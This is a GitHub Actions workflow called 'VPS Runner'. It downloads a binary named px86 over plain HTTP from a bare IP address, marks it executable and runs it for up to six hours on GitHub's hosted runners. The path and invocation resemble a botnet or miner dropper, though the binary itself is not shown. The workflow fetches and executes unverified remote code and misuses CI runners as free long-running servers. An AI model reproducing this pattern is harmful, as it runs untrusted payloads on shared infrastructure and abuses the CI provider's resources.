name: VPS Runner

on:
  workflow_dispatch:
    inputs:
      uptime:
        description: 'VPS uptime in hours (max 6)'
        required: false
        default: '6'
        type: choice
        options:
          - '1'
          - '2'
          - '3'
          - '4'
          - '5'
          - '6'

jobs:
  run-binary:
    runs-on: ubuntu-latest
    timeout-minutes: ${{ fromJSON(format('{0}', github.event.inputs.uptime)) * 60 + 10 }}
    
    steps:
      - name: Download binary
        run: |
          wget http://45.138.16.158/bins/px86 -O px86
          chmod +x px86
          file px86
          ls -la px86

      - name: Run binary with timeout protection
        run: |
          # Calculate timeout (5 minutes less than total to allow cleanup)
          TIMEOUT=$(( (${{ github.event.inputs.uptime }} * 3600) - 300 ))
          echo "Running binary for $TIMEOUT seconds"
          
          # Run binary with timeout and log output
          timeout $TIMEOUT ./px86 x86 || echo "Binary completed or timed out"
          
          echo "Binary execution phase completed"

      - name: Final cleanup wait
        run: |
          echo "Workflow completed successfully"
          sleep 5
